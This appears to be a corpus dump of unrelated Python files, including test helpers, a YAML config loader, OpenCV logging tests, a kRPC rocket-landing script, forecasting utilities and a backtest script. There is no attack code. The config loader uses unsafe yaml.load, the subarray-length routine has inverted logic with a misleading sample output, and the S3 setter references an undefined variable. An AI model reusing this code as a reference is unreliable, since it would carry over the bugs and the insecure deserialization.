expected_path: Optional[str] = None,
expected_fields: Iterable[str] = None,
url_parser: Optional[Callable[
[str, Optional[Iterable[str]]],
Tuple[str, Dict[str, str]]]] = None,
timer: Optional[Timer] = None,
signer_cls: Optional[Type[URLParamsSigner]] = None,
):
url_parser_ = url_parser if url_parser is not None else _parse_verification_url
try:
url_path, verification_data = url_parser_(url, expected_fields)
except ValueError as exc:
pytest.fail(str(exc))
if expected_path is not None:
assert url_path == expected_path
if expected_fields is not None:
assert set(verification_data.keys()) == set(expected_fields)
if timer is not None:
url_sig_timestamp = int(verification_data['timestamp'])
assert timer.start_time <= url_sig_timestamp <= timer.end_time
if signer_cls is not None:
signer = signer_cls(verification_data)
signer.verify()
return verification_data
def _parse_verification_url(
url: str,
verification_field_names: Optional[Iterable[str]],
) -> Tuple[str, Dict[str, str]]:
parsed_url = urlparse(url)
query = parse_qs(parsed_url.query, strict_parsing=True)
for key, values in query.items():
if not values:
raise ValueError("no values for '{key}".format(key=key))
if len(values) > 1:
raise ValueError("multiple values for '{key}'".format(key=key))
verification_data = {key: values[0] for key, values in query.items()}
return parsed_url.path, verification_data
|
157822
|
from civil_registry.models import Citizen
from register.models import SMS
# Ripped from the DB but with some capitalization.
CARRIER_CODING = {2: 'Libyana',
3: 'AlMadar',
4: 'Thuraya'}
# The code could be refactored further to allow mixed case
# string values as in SMS.DIRECTION_CHOICES.
MESSAGE_DIRECTION = dict([(direction_value, direction_string.lower())
for direction_value, direction_string
in SMS.DIRECTION_CHOICES])
MESSAGE_TYPES = dict(SMS.MESSAGE_TYPES)
GENDER_CODING = dict(Citizen.GENDERS)
AGE_RANGES = [(18, 29), (30, 39), (40, 49), (50, 59), (60, None)]
AGE_CODING = {}
for (low, high) in AGE_RANGES:
if high is None:
key = '{}+'.format(low)
high = 200
else:
key = '{}-{}'.format(low, high)
for i in range(low, high + 1):
AGE_CODING[i] = key
|
157846
|
import yaml
# 填充默认设置
default_config = {
'debug_mode': False,
'save_manifest_file': True,
'output_path': './output',
'proxy': None,
'downloader_max_connection_number': 5,
'downloader_max_retry_number': 5,
'friendly_console_output': False,
'header': {
'referer': 'https://manhua.dmzj.com/',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'
},
}
config = {}
def load(text):
global config
config = yaml.load(text)
def load_file(file_path):
with open(file_path) as f:
load(f.read())
def get(key, fallback=False):
keys = key.split('.')
if fallback == True:
target = default_config
else:
target = config
for k in keys:
target = target.get(k)
if target == None and not fallback == True:
target = get(key, fallback=True)
return target
|
157884
|
import cvlog as log
import cv2
import numpy as np
from .utils import read_file, remove_dirs, get_html
def test_log_image():
remove_dirs('log/')
img = cv2.imread("tests/data/orange.png")
log.set_mode(log.Mode.LOG)
log.image(log.Level.ERROR, img)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'image'
assert logitem[0]['logdata'] == read_file('tests/data/expected/image.txt')
def test_log_edges():
remove_dirs('log/')
img = cv2.imread('tests/data/sudoku.png')
log.set_mode(log.Mode.LOG)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray, 50, 150, apertureSize=3)
log.edges(log.Level.ERROR, edges)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'edges'
assert logitem[0]['logdata'] == read_file('tests/data/expected/edges.txt')
def test_log_threshold():
remove_dirs('log/')
img = cv2.imread('tests/data/board.jpg')
log.set_mode(log.Mode.LOG)
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 127, 255, 0)
log.threshold(log.Level.ERROR, thresh)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'threshold'
assert logitem[0]['logdata'] == read_file('tests/data/expected/thershold.txt')
def test_log_hough_lines():
remove_dirs('log/')
img = cv2.imread('tests/data/sudoku.png')
log.set_mode(log.Mode.LOG)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray, 50, 150, apertureSize=3)
lines = cv2.HoughLines(edges, 1, np.pi / 180, 200)
log.hough_lines(log.Level.ERROR, lines, img)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'hough lines'
assert logitem[0]['logdata'] == read_file('tests/data/expected/houghline_img.txt')
def test_log_hough_circles():
remove_dirs('log/')
img = cv2.imread('tests/data/board.jpg')
log.set_mode(log.Mode.LOG)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
blur = cv2.medianBlur(gray, 5)
circles = cv2.HoughCircles(blur, cv2.HOUGH_GRADIENT, 1, 10, np.array([]), 100, 30, 1, 30)
log.hough_circles(log.Level.ERROR, circles, img)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'hough circles'
assert logitem[0]['logdata'] == read_file('tests/data/expected/houghcircle_img.txt')
def test_contours():
remove_dirs('log/')
img = cv2.imread('tests/data/contour.jpg')
log.set_mode(log.Mode.LOG)
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 127, 255, 0)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
log.contours(log.Level.ERROR, contours, img)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'contours'
assert logitem[0]['logdata'] == read_file('tests/data/expected/contour.txt')
def test_keypoints():
remove_dirs('log/')
img = cv2.imread('tests/data/orange.png')
log.set_mode(log.Mode.LOG)
gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
orb = cv2.ORB_create()
kp, _ = orb.detectAndCompute(gray_img, None)
log.keypoints(log.Level.ERROR, kp, img, flags=cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.log-type')[0].text == 'key points'
print(logitem[0]['logdata'])
# assert log_item[0]['logdata'] == read_file('tests/data/expected/keypoints.txt') #TODO Fix circle ci issue
def test_message():
remove_dirs('log/')
img = cv2.imread('tests/data/contour.jpg')
log.set_mode(log.Mode.LOG)
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 127, 255, 0)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
message = 'Lorem ipsum dolor sit amet, ne persius reprehendunt mei. Ea summo elitr munere his, et consul offendit recteque sea, quis elit nam ut.'
log.image(log.Level.ERROR, img)
log.contours(log.Level.ERROR, contours, img, msg=message)
logitem = get_html('log/cvlog.html').select('.log-list .log-item')
assert logitem[0].select('.description') == []
assert logitem[1].select('.description')[0].text == message
|
157964
|
import krpc
import time
conn = krpc.connect(name="UI Test")
vessel = conn.space_center.active_vessel
kerbin_frame = vessel.orbit.body.reference_frame
orb_frame = vessel.orbital_reference_frame
srf_frame = vessel.surface_reference_frame
surface_gravity = vessel.orbit.body.surface_gravity
current_roll = conn.add_stream(getattr, vessel.flight(), 'roll')
current_pitch = conn.add_stream(getattr, vessel.flight(), 'pitch')
current_heading = conn.add_stream(getattr, vessel.flight(), 'heading')
current_alt = conn.add_stream(getattr, vessel.flight(), 'surface_altitude')
current_apo = conn.add_stream(getattr, vessel.orbit, 'apoapsis_altitude')
current_per = conn.add_stream(getattr, vessel.orbit, 'periapsis_altitude')
lowest = conn.add_stream(vessel.bounding_box, srf_frame)
bottom_alt = max(0, int(current_alt() - abs(lowest()[0][0])))
def engine_amount(number_of_engines):
if number_of_engines == 1:
vessel.control.toggle_action_group(1)
vessel.control.toggle_action_group(3)
elif number_of_engines == 3:
vessel.control.toggle_action_group(1)
vessel.control.toggle_action_group(2)
elif number_of_engines == 9:
vessel.control.toggle_action_group(4)
else:
print(f"Not a Valid Engine Request")
def twr():
return vessel.thrust / (vessel.mass * surface_gravity)
engine_amount(9)
vessel.control.throttle = 1
vessel.control.activate_next_stage()
vessel.control.activate_next_stage()
vessel.auto_pilot.engage()
vessel.auto_pilot.target_pitch = 85
vessel.auto_pilot.target_heading = 270
vessel.auto_pilot.target_roll = 0
while current_apo() < 10000:
if twr() > 3:
vessel.control.throttle -= .1
elif twr() <= 2:
vessel.control.throttle += .1
time.sleep(.1)
vessel.control.throttle = 0
vessel.auto_pilot.disengage()
vessel.control.sas = True
vessel.control.rcs = True
time.sleep(.1)
vessel.control.sas_mode = conn.space_center.SASMode.prograde
while vessel.flight(kerbin_frame).vertical_speed > 0:
time.sleep(1)
time.sleep(5)
vessel.control.sas_mode = conn.space_center.SASMode.retrograde
vessel.control.brakes = True
engine_amount(3)
while current_alt() > 1250:
time.sleep(.1)
vessel.control.throttle = 1
while vessel.flight(kerbin_frame).vertical_speed < -50:
time.sleep(.1)
vessel.control.gear = True
while max(0, int(current_alt() - abs(lowest()[0][0]))) > 10:
if vessel.flight(kerbin_frame).vertical_speed < -5:
vessel.control.throttle += .1
else:
vessel.control.throttle -= .1
time.sleep(.05)
vessel.control.throttle = 0
# throttle < 10 and TWR > 2
# Go to 3 engines
|
158006
|
from .config import Config
from .lsi_text import Text
class LsiVisualTransforms():
def __init__(self):
"""
Visual Transforms (for item).
e.g. set color, set indent.
"""
# Set Config
self.config = Config()
def _add_indent_to_new_line(self, item, prev_status):
"""
Visual transform for Description.
Add indent to new line. \n -> \n____
Parameters
----------
item : Dict
prev_status : Boolean
Returns
-------
status : Boolean
item : Dict
"""
if 'description' not in item.keys():
status = 1
return status, item
indent_length = 3 * (item['depth']+1)
base_name = item['path']
description = item['description'].text
blank = '│' + ' '*int(indent_length + len(item['path']) + 3)
description = description.split('\n')
for i, desc in enumerate(description[::-1]):
if not (set(' ') == set(desc) or set('') == set(desc)):
break
description = description[:len(description) - i]
item['description'].text = '\n'.join(description)
if len(description)>=2:
insert_count = 0
for desc in description[:-1]:
insert_count += len(desc)+1
item['description'].insert_text(blank, insert_count)
item['description'].insert_style(';nl;', insert_count)
item['description'].insert_style(';nle;', insert_count+len(blank))
insert_count += len(blank)
status = 0
return status, item
def _select_indent_head(self, item, place):
"""
Select indent head ├,└
Parameters
----------
item : Dict
place : Int
0 if item is not last of children
1 if item is last of children
Returns
-------
head : String (├ or └)
item : Dict
"""
if place==0:
return '├', item
if place==1:
if 'description' in item.keys():
item['description'].text = item['description'].text.replace('│', ' ')
return '└', item
if place==2:
return '', item
def _concat_item(self, item, place):
"""
Concatenate all texts.
Output final string like below.
'file name / description\n
new line description'
Parameters
----------
item : Dict
prev_status : Boolean
Returns
-------
status : Boolean
output : String
"""
head, item = self._select_indent_head(item, place)
if 'description' in item.keys():
description = item['description']
else:
description = Text(item['type'], ';w;')
indent = head+' '*3*item['depth'] + self.config.indent
if place==2:
output = description.render()
else:
output = indent + item['path'].render() + ' / ' + description.render()
status = 0
return status, output
def run(self, item, condition):
"""
This apply visual_transforms to an item.
Parameters
----------
item : Dict
condition : Dict
Returns
-------
status : Boolean
0 == success
1 == failed
output : String
An visualized item.
This will be printed to the terminal.
"""
prev_status = condition['status']
transforms = []
if condition['is_last']!=2:
transforms += [self._add_indent_to_new_line]
for tr in transforms:
prev_status, item = tr(item, prev_status)
status, output = self._concat_item(item, condition['is_last'])
return status, output
|
158023
|
import os
import sys
from JciHitachi import __author__, __version__
git_repo_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
requirements_txt_path = os.path.join(git_repo_path, "requirements.txt")
requirements_test_txt_path = os.path.join(git_repo_path, "requirements_test.txt")
sys.path.append(git_repo_path)
sys.path.append(os.path.join(git_repo_path, "docs", "source"))
import conf
from setup import install_requires, tests_require
class TestSanity:
def test_annotions_consistency(self):
assert __author__ == conf.author
assert f"v{__version__}" == conf.release
def test_install_requirements_consistency(self):
with open(requirements_txt_path, 'r', encoding='utf-8') as f:
req_txt = f.read().split('\n')
assert set(install_requires) == set(req_txt)
def test_test_requirements_consistency(self):
with open(requirements_test_txt_path, 'r', encoding='utf-8') as f:
req_txt = f.read().split('\n')
assert set(tests_require) == set(req_txt)
|
158037
|
import pygame
from .component import Component
from .colours import *
class EmoteComponent(Component):
def __init__(self,
# required parameters
image,
# optional parameters
timed=True,
timer=200,
):
self.key = 'emote'
# store the passed parameters
self.image = image
self.timed = timed
self.timer = timer
# set additional component properties
self.bottomMargin = 10
self.imagePadding = 2
self.destroy = False
def update(self):
# decrement timer
if self.timed:
self.timer -= 1
# destroy if timer reaches 0
if self.timer <= 0:
self.destroy = True
|
158068
|
from collections import defaultdict
import sys
def subArraylen(arr, n, K):
mp = defaultdict(lambda: 0)
mp[arr[0]] = 0
for i in range(1, n):
arr[i] = arr[i] + arr[i - 1]
mp[arr[i]] = i
ln = sys.maxsize
for i in range(n):
if(arr[i] < K):
continue
else:
x = K - arr[i]
if(x == 0):
ln = min(ln, i)
if(x in mp.keys()):
continue
else:
ln = min(ln, i - mp[x])
return ln
arr = []
n = int(input("enter the number of elements"))
for i in range(0, n):
ele = int(input("enter the elements"))
arr.append(ele)
K = int(input("enter the sum "))
ln = subArraylen(arr, n, K)
if(ln == sys.maxsize):
print("-1")
else:
print(ln)
# Time complexity: O(NlogN)
# Space Complexity: O(N)
'''
Output:
enter the number of elements6
enter the elements2
enter the elements4
enter the elements6
enter the elements10
enter the elements2
enter the elements1
enter the sum 12
2
'''
|
158074
|
import pandas as pd
from .paramdb import *
from .file import *
from .utils import *
from doit.tools import run_once
def print_nested_df(orig):
dfs = [None]
def dedf(x):
if isinstance(x, pd.DataFrame):
i = len(dfs)
dfs.append(x)
return f"df{i}"
return x
dfs[0] = orig.applymap(dedf)
for i, df in enumerate(dfs):
print(f"df{i}:\n", df)
def get_file_paths(pdb_row, file_key):
return pdb_row[file_key]['path'].tolist()
class Task(object):
"""Base Task"""
@classmethod
def create_doit_tasks(cls):
show_details = 0
if show_details:
print(f"\n=================== Working on {cls} =============\n")
if cls is Task:
return # avoid create tasks from base class 'Task'
# Build a dictionary from the class variables
kw = dict((a, getattr(cls, a)) for a in dir(cls) if not a.startswith('_'))
# We are interested only in few class variables
kw = {k:v for k,v in kw.items() if k in ['param', 'mask', 'mask_row', 'keep', 'inputs', 'targets', 'run', 'actions']}
kw['doc'] = cls.__doc__
kw['basename'] = cls.__name__
kw['clean'] = True
kw['verbosity'] = 2
global JUDI_PARAM
param = (kw.pop('param') if 'param' in kw else JUDI_PARAM).copy()
mask = kw.pop('mask') if 'mask' in kw else None
if mask: param.mask(mask)
mask_row = kw.pop('mask_row') if 'mask_row' in kw else None
if mask_row: param.query(mask_row)
keep = kw.pop('keep') if 'keep' in kw else None
if keep: param.keep(keep)
# A JUDI task must define targets and optionally inputs
targets = kw.pop('targets')
file_dicts = [targets]
inputs = None
if 'inputs' in kw:
inputs = kw.pop('inputs')
file_dicts += [inputs]
cfg_cols = param.df.columns.tolist()
cfg_cols_wo_spl = list(filter(lambda x: x != 'JUDI', cfg_cols))
def engroup(x, cols):
#print(x)
#we need to reindex the dataframe, otherwise it gives some error
return pd.DataFrame({fkey:[x.drop(cols, axis='columns').reindex()]})
# TODO: make sure that none of the parameter values is NaN
# For each input/target file f create D_{t,f} table
# and merge the information to the param.df db
for files in file_dicts:
for fkey in files.keys():
#print("============", fkey, "=============")
grp_cols = list(filter(lambda x: x in cfg_cols, files[fkey].param.df.columns))
#print(grp_cols)
#print(files[fkey].param.df)
dtf = files[fkey].param.df.groupby(grp_cols).apply(engroup, cols=grp_cols)
#print(dtf)
#print("~~~~~~~*********\nnested dtf")
#print_nested_df(dtf)
dtf.index = dtf.index.droplevel(len(grp_cols))
dtf = dtf.reset_index()
#print("******************\nnested dtf")
#print_nested_df(dtf)
param.df = param.df.merge(dtf)
#print("##################\nnested df")
#print_nested_df(param.df)
# add name only after saving the original config columns
param.df['name'] = param.df[cfg_cols].apply(lambda x: get_cfg_str(x), axis='columns')
param.df['parcfg'] = param.df[cfg_cols].apply(lambda x: get_cfg_str_unsrt(x), axis='columns')
#print_nested_df(param.df)
def substitute(arg, t):
if isinstance(arg, str):
if arg[0] == '$':
plist = t[arg[1:]]['path'].tolist()
return(plist[0] if len(plist) == 1 else plist)
elif arg[0] == '#':
if arg == '##':
return(t[cfg_cols_wo_spl])
else:
#print(kw['basename'])
#print(arg)
#print(t[arg[1:]])
return(t[arg[1:]])
else:
return(arg)
else:
return(arg)
for (j, t) in param.df.iterrows():
#print(t['parcfg'])
newkw = kw.copy()
newkw['name'] = t['name']
newkw['targets'] = [p for f in targets.keys() for p in get_file_paths(t, f)]
if inputs:
newkw['file_dep'] = [p for f in inputs.keys() for p in get_file_paths(t, f)]
else :
# if inputs not define, make targets to be built only once
newkw['uptodate'] = [run_once]
if 'actions' not in newkw:
#get the name of the arguments of run
varnames = newkw['run'].__code__.co_varnames[1:] # first variable is 'self' which should be ignored
newkw['actions'] = [(newkw.pop('run'), [get_file_paths(t, v) for v in varnames])] # TODO: list as argument
else:
actions = []
# add one action to make sure that the target directory exists
# if not create one
for tgt_path in newkw['targets']:
actions += [(ensure_dir, [tgt_path], {})]
for action in newkw['actions']:
newargs = []
newactkws = {}
if isinstance(action, (list,tuple)):
if (len(action) > 2):
act, args, act_kw = action
else:
act, args = action
act_kw = {}
else:
act = action
for arg in args:
newargs.append(substitute(arg, t))
for act_key in act_kw:
newactkws[act_key] = substitute(act_kw[act_key], t)
if isinstance(act, str):
for i, v in enumerate(newargs):
if isinstance(v, list):
newargs[i] = ' '.join(v)
newact = act.format(*newargs)
newargs = []
else:
newact = act
actions += [(newact, newargs, newactkws) if len(newargs) + len(newactkws) else (newact)]
newkw['actions'] = actions
if show_details:
print("------------------")
for key, val in newkw.items():
print(key, "\t:", val)
yield newkw
|
158121
|
from bitmovin.utils import Serializable
from bitmovin.resources.enums import S3SignatureVersion
from . import AbstractOutput
class GenericS3Output(AbstractOutput, Serializable):
def __init__(self, access_key, secret_key, bucket_name, host, port=None, signature_version=None, ssl=None, id_=None, custom_data=None,
name=None, description=None):
super().__init__(id_=id_, custom_data=custom_data, name=name, description=description)
self._signatureVersion = None
self.accessKey = access_key
self.secretKey = secret_key
self.bucketName = bucket_name
self.host = host
self.port = port
self.signatureVersion = signature_version
self.ssl = ssl
@property
def signatureVersion(self):
return self._signatureVersion
@signatureVersion.setter
def signatureVersion(self, new_sigver):
if new_sigver is None:
return
if isinstance(new_sigver, str):
self._signatureVersion = new_sigver
elif isinstance(new_sigver, S3SignatureVersion):
self._signatureVersion = new_sigver.value
else:
raise InvalidTypeError(
'Invalid type {} for signatureVersion: must be either str or S3SignatureVersion!'.format(type(new_signatureVersion)))
@classmethod
def parse_from_json_object(cls, json_object):
id_ = json_object['id']
bucket_name = json_object['bucketName']
access_key = json_object.get('accessKey')
secret_key = json_object.get('secretKey')
name = json_object.get('name')
description = json_object.get('description')
host = json_object.get('host')
port = json_object.get('port')
signature_version = json_object.get('signatureVersion')
ssl = json_object.get('ssl')
generic_s3_output = GenericS3Output(
access_key=access_key, secret_key=secret_key, bucket_name=bucket_name, host=host, port=port, signature_version=signature_version,
ssl=ssl, id_=id_, name=name, description=description)
return generic_s3_output
def serialize(self):
serialized = super().serialize()
serialized['signatureVersion'] = self.signatureVersion
return serialized
|
158179
|
from copy import copy
from typing import Union
import numpy as np
from fedot.core.data.data import InputData, OutputData
from fedot.core.data.multi_modal import MultiModalData
from fedot.core.operations.evaluation.operation_implementations.data_operations.ts_transformations import ts_to_table
from fedot.core.repository.dataset_types import DataTypesEnum
from fedot.core.repository.tasks import TaskTypesEnum
def out_of_sample_ts_forecast(pipeline, input_data: InputData,
horizon: int = None) -> np.array:
"""
Method allow make forecast with appropriate forecast length. The previously
predicted parts of the time series are used for forecasting next parts. Available
only for time series forecasting task. Steps ahead provided iteratively.
time series ----------------|
forecast |---|---|---|
:param pipeline: Pipeline for making time series forecasting
:param input_data: data for prediction
:param horizon: forecasting horizon
:return final_forecast: array with forecast
"""
# Prepare data for time series forecasting
task = input_data.task
exception_if_not_ts_task(task)
if isinstance(input_data, InputData):
pre_history_ts = np.array(input_data.features)
# How many elements to the future pipeline can produce
scope_len = task.task_params.forecast_length
number_of_iterations = _calculate_number_of_steps(scope_len, horizon)
# Make forecast iteratively moving throw the horizon
final_forecast = []
for _ in range(0, number_of_iterations):
iter_predict = pipeline.root_node.predict(input_data=input_data)
iter_predict = np.ravel(np.array(iter_predict.predict))
final_forecast.append(iter_predict)
# Add prediction to the historical data - update it
pre_history_ts = np.hstack((pre_history_ts, iter_predict))
# Prepare InputData for next iteration
input_data = _update_input(pre_history_ts, scope_len, task)
elif isinstance(input_data, MultiModalData):
data = MultiModalData()
for data_id in input_data.keys():
features = input_data[data_id].features
pre_history_ts = np.array(features)
source_len = len(pre_history_ts)
# How many elements to the future pipeline can produce
scope_len = task.task_params.forecast_length
number_of_iterations = _calculate_number_of_steps(scope_len, horizon)
# Make forecast iteratively moving throw the horizon
final_forecast = []
for _ in range(0, number_of_iterations):
iter_predict = pipeline.predict(input_data=input_data)
iter_predict = np.ravel(np.array(iter_predict.predict))
final_forecast.append(iter_predict)
# Add prediction to the historical data - update it
pre_history_ts = np.hstack((pre_history_ts, iter_predict))
# Prepare InputData for next iteration
input_data = _update_input(pre_history_ts, scope_len, task)
# Create output data
final_forecast = np.ravel(np.array(final_forecast))
# Clip the forecast if it is necessary
final_forecast = final_forecast[:horizon]
return final_forecast
def in_sample_ts_forecast(pipeline, input_data: Union[InputData, MultiModalData],
horizon: int = None) -> np.array:
"""
Method allows to make in-sample forecasting. The actual values of the time
series, rather than the previously predicted parts of the time series,
are used for forecasting next parts.
time series ----------------|---|---|---|
forecast |---|---|---|
:param pipeline: Pipeline for making time series forecasting
:param input_data: data for prediction
:param horizon: forecasting horizon
:return final_forecast: array with forecast
"""
# Divide data on samples into pre-history and validation part
task = input_data.task
exception_if_not_ts_task(task)
if isinstance(input_data, InputData):
time_series = np.array(input_data.features)
pre_history_ts = time_series[:-horizon]
source_len = len(pre_history_ts)
last_index_pre_history = source_len - 1
# How many elements to the future pipeline can produce
scope_len = task.task_params.forecast_length
number_of_iterations = _calculate_number_of_steps(scope_len, horizon)
# Calculate intervals
intervals = _calculate_intervals(last_index_pre_history,
number_of_iterations,
scope_len)
data = _update_input(pre_history_ts, scope_len, task)
else:
# TODO simplify
data = MultiModalData()
for data_id in input_data.keys():
features = input_data[data_id].features
time_series = np.array(features)
pre_history_ts = time_series[:-horizon]
source_len = len(pre_history_ts)
last_index_pre_history = source_len - 1
# How many elements to the future pipeline can produce
scope_len = task.task_params.forecast_length
number_of_iterations = _calculate_number_of_steps(scope_len, horizon)
# Calculate intervals
intervals = _calculate_intervals(last_index_pre_history,
number_of_iterations,
scope_len)
local_data = _update_input(pre_history_ts, scope_len, task)
data[data_id] = local_data
# Make forecast iteratively moving throw the horizon
final_forecast = []
for _, border in zip(range(0, number_of_iterations), intervals):
iter_predict = pipeline.predict(input_data=data)
iter_predict = np.ravel(np.array(iter_predict.predict))
final_forecast.append(iter_predict)
if isinstance(input_data, InputData):
# Add actual values to the historical data - update it
pre_history_ts = time_series[:border + 1]
# Prepare InputData for next iteration
data = _update_input(pre_history_ts, scope_len, task)
else:
# TODO simplify
data = MultiModalData()
for data_id in input_data.keys():
features = input_data[data_id].features
time_series = np.array(features)
pre_history_ts = time_series[:border + 1]
local_data = _update_input(pre_history_ts, scope_len, task)
data[data_id] = local_data
# Create output data
final_forecast = np.ravel(np.array(final_forecast))
# Clip the forecast if it is necessary
final_forecast = final_forecast[:horizon]
return final_forecast
def fitted_values(train_predicted: OutputData, horizon_step: int = None) -> OutputData:
""" The method converts a multidimensional lagged array into an
one-dimensional array - time series based on predicted values for training sample
:param train_predicted: OutputData
:param horizon_step: index of elements for forecast. If None - perform
averaging for all forecasting steps
"""
copied_data = copy(train_predicted)
if horizon_step is not None:
# Take particular forecast step
copied_data.predict = copied_data.predict[:, horizon_step]
copied_data.idx = copied_data.idx + horizon_step
return copied_data
else:
# Perform collapse with averaging
forecast_length = copied_data.task.task_params.forecast_length
# Extend source index range
indices_range = np.arange(copied_data.idx[0], copied_data.idx[-1] + forecast_length + 1)
# Lagged matrix with indices in cells
_, idx_matrix = ts_to_table(idx=indices_range,
time_series=indices_range,
window_size=forecast_length)
predicted_matrix = copied_data.predict
# For every index calculate mean predictions (by all forecast steps)
final_predictions = []
indices_range = indices_range[:-1]
for index in indices_range:
vals = predicted_matrix[idx_matrix == index]
mean_value = np.mean(vals)
final_predictions.append(mean_value)
copied_data.predict = np.array(final_predictions)
copied_data.idx = indices_range
return copied_data
def in_sample_fitted_values(train_predicted: OutputData) -> OutputData:
""" Perform in sample validation based on training sample """
forecast_length = train_predicted.task.task_params.forecast_length
all_values = []
step = 0
# Glues together parts of predictions using "in-sample" way
while step < len(train_predicted.predict):
all_values.extend(train_predicted.predict[step, :])
step += forecast_length
# In some cases it doesn't reach the end
if not np.isclose(all_values[-1], train_predicted.predict[-1, -1]):
missing_part_index = step - len(train_predicted.predict) + 1
# Store missing predicted values
all_values.extend(train_predicted.predict[-1, missing_part_index:])
copied_data = copy(train_predicted)
copied_data.predict = np.array(all_values)
# Update indices
first_id = copied_data.idx[0]
copied_data.idx = np.arange(first_id, first_id + len(all_values))
return copied_data
def _calculate_number_of_steps(scope_len, horizon):
""" Method return amount of iterations which must be done for multistep
time series forecasting
:param scope_len: time series forecasting length
:param horizon: forecast horizon
:return amount_of_steps: amount of steps to produce
"""
amount_of_iterations = int(horizon // scope_len)
# Remainder of the division
resid = int(horizon % scope_len)
if resid == 0:
amount_of_steps = amount_of_iterations
else:
amount_of_steps = amount_of_iterations + 1
return amount_of_steps
def _update_input(pre_history_ts, scope_len, task):
""" Method make new InputData object based on the previous part of time
series
:param pre_history_ts: time series
:param scope_len: how many elements to the future can algorithm forecast
:param task: time series forecasting task
:return input_data: updated InputData
"""
start_forecast = len(pre_history_ts)
end_forecast = start_forecast + scope_len
input_data = InputData(idx=np.arange(start_forecast, end_forecast),
features=pre_history_ts, target=None,
task=task, data_type=DataTypesEnum.ts)
return input_data
def _calculate_intervals(last_index_pre_history, amount_of_iterations, scope_len):
""" Function calculate
:param last_index_pre_history: last id of the known part of time series
:param amount_of_iterations: amount of steps for time series forecasting
:param scope_len: amount of elements in every time series forecasting step
:return intervals: ids of finish of every step in time series
"""
intervals = []
current_border = last_index_pre_history
for i in range(0, amount_of_iterations):
current_border = current_border + scope_len
intervals.append(current_border)
return intervals
def exception_if_not_ts_task(task):
if task.task_type != TaskTypesEnum.ts_forecasting:
raise ValueError(f'Method forecast is available only for time series forecasting task')
|
158181
|
from PhysicsTools.Heppy.analyzers.objects.JetAnalyzer import JetAnalyzer
from PhysicsTools.Heppy.analyzers.objects.LeptonAnalyzer import LeptonAnalyzer
from PhysicsTools.Heppy.analyzers.objects.METAnalyzer import METAnalyzer
from PhysicsTools.Heppy.analyzers.objects.PhotonAnalyzer import PhotonAnalyzer
from PhysicsTools.Heppy.analyzers.objects.TauAnalyzer import TauAnalyzer
from PhysicsTools.Heppy.analyzers.objects.IsoTrackAnalyzer import IsoTrackAnalyzer
from PhysicsTools.Heppy.analyzers.objects.VertexAnalyzer import VertexAnalyzer
|
158182
|
def aio_documented_by(original):
def wrapper(target):
target.__doc__ = "Aio function: {original_doc}".format(original_doc=original.__doc__)
return target
return wrapper
def documented_by(original):
def wrapper(target):
target.__doc__ = original.__doc__
return target
return wrapper
|
158209
|
import os
def delete_old_logs():
log_path = "logs"
error = False
for root, dirs, files in os.walk(log_path):
for file in files:
path = os.path.join(root, file)
try:
os.remove(path)
except Exception as e:
print("Could not delete file: " + path)
print(str(e))
if(error):
print("Logs deleted, but there were some errors")
else:
print("All logs where deleted successfully")
if __name__ == '__main__':
delete_old_logs()
|
158266
|
import numpy as np
import matplotlib.pyplot as plt
x = np.linspace(-1, 1, 50)
y = np.cos(np.linspace(0, 0.5 * np.pi))
plt.title("curve")
plt.grid()
plt.xlim(-1, 1)
plt.ylim(-1.05, +1.05)
plt.plot(x, y)
plt.show()
|
158336
|
from ndfinance.brokers.backtest import *
from ndfinance.core import BacktestEngine
from ndfinance.analysis.backtest.analyzer import BacktestAnalyzer
from ndfinance.analysis.technical import RateOfChange
from ndfinance.visualizers.backtest_visualizer import BasicVisualizer
from ndfinance.strategies.trend import ActualMomentumStratagy
from ndfinance.callbacks import PositionWeightPrinterCallback
from ndfinance import reporters
import matplotlib.pyplot as plt
import FinanceDataReader as fdr
def main(tickers, name="NAME", n=200, momentum_threshold=1, rebalance_period=TimeFrames.day * 28):
dp = BacktestDataProvider()
dp.add_yf_tickers(*tickers)
dp.add_technical_indicators(tickers, [TimeFrames.day], [RateOfChange(n)])
indexer = TimeIndexer(dp.get_longest_timestamp_seq())
dp.set_indexer(indexer)
brk = BacktestBroker(dp, initial_margin=10000)
[brk.add_asset(Asset(ticker=ticker)) for ticker in tickers]
strategy = ActualMomentumStratagy(
momentum_threshold=momentum_threshold,
rebalance_period=rebalance_period,
momentum_label=f"ROCR{n}",
)
engine = BacktestEngine()
engine.register_broker(brk)
engine.register_strategy(strategy)
log = engine.run()
reporters.make_html(log, "^IXIC", output=f"{name}_dualmomentum.html")
if __name__ == '__main__':
main([
"AAPL",
"FB",
"NFLX",
"GOOGL",
"NVDA",
"TSLA",
"AMZN",
"TWTR",
"BIDU",
"BABA"
], name="FANG+")
|
158371
|
def Qklnu(cfg,k,l,nu) : #function q=Qklnu(k,l,nu)
#
